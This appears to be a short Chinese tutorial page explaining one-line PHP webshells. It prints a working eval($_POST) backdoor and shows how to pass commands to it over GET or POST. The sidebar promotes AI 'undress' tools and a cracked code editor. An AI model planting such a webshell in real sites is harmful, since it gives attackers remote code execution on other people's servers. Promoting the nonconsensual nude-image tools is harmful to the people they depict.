搜尋
首頁後端開發PHP問題php小馬是什麼

php小馬是什麼

Oct 02, 2019 am 09:30 AM

php小馬是什麼

php小馬是什麼?

php小馬也就是一句話木馬,就是指只需要一行程式碼的木馬,短短一行程式碼,就能做到和大馬相當的功能。為了繞過waf的偵測,一句話木馬出現了無數中變形,但本質是不變的:木馬的函數執行了我們發送的命令。

我們如何發送命令,發送的命令如何執行?

我們可以透過GET 、POST 、COOKIE這三種方式向一個網站提交數據,一句話木馬用$_GET[' ']、$_POST[' ']、$_COOKIE[' ' ] 接收我們傳遞的數據,並把接收的數據傳遞給一句話木馬中執行命令的函數,進而執行命令。

所以看到的經典一句話木馬大多都是只有兩個部分,一個是可以執行程式碼的函數部分,一個是接收資料的部分。

例如:

<?php eval(@$_POST[&#39;a&#39;]); ?>

其中eval就是執行指令的函數,$_POST['a']就是接收的資料。 eval函數把接收的資料當作PHP程式碼來執行。這樣我們就能夠讓插入了一句話木馬的網站執行我們傳遞過去的任意PHP語句。這便是一句話木馬的強大之處。

範例:

php小馬是什麼

因為木馬是接收post請求中「a」 的資料( $_POST['a']),所以我們必須以post方法發送資料並且將我們要執行的程式碼賦值給“a”。如果把木馬中的post替換成get,那麼我麼就需要以GET方法發送“a”,( 就像這樣:http://127.0.0.1/test.php?a=phpinfo(); )我就不再另行演示了。

更多PHP知識,請造訪PHP中文網

以上是php小馬是什麼的詳細內容。更多資訊請關注PHP中文網其他相關文章!

陳述
本文內容由網友自願投稿,版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容,請聯絡admin@php.cn

熱AI工具

Undresser.AI Undress

Undresser.AI Undress

人工智慧驅動的應用程序,用於創建逼真的裸體照片

AI Clothes Remover

AI Clothes Remover

用於從照片中去除衣服的線上人工智慧工具。

Undress AI Tool

Undress AI Tool

免費脫衣圖片

Clothoff.io

Clothoff.io

AI脫衣器

Video Face Swap

Video Face Swap

使用我們完全免費的人工智慧換臉工具,輕鬆在任何影片中換臉!

熱門文章

熱工具

WebStorm Mac版

WebStorm Mac版

好用的JavaScript開發工具

EditPlus 中文破解版

EditPlus 中文破解版

體積小,語法高亮,不支援程式碼提示功能

SecLists

SecLists

SecLists是最終安全測試人員的伙伴。它是一個包含各種類型清單的集合,這些清單在安全評估過程中經常使用,而且都在一個地方。 SecLists透過方便地提供安全測試人員可能需要的所有列表,幫助提高安全測試的效率和生產力。清單類型包括使用者名稱、密碼、URL、模糊測試有效載荷、敏感資料模式、Web shell等等。測試人員只需將此儲存庫拉到新的測試機上,他就可以存取所需的每種類型的清單。

SublimeText3 Mac版

SublimeText3 Mac版

神級程式碼編輯軟體(SublimeText3)

Atom編輯器mac版下載

Atom編輯器mac版下載

最受歡迎的的開源編輯器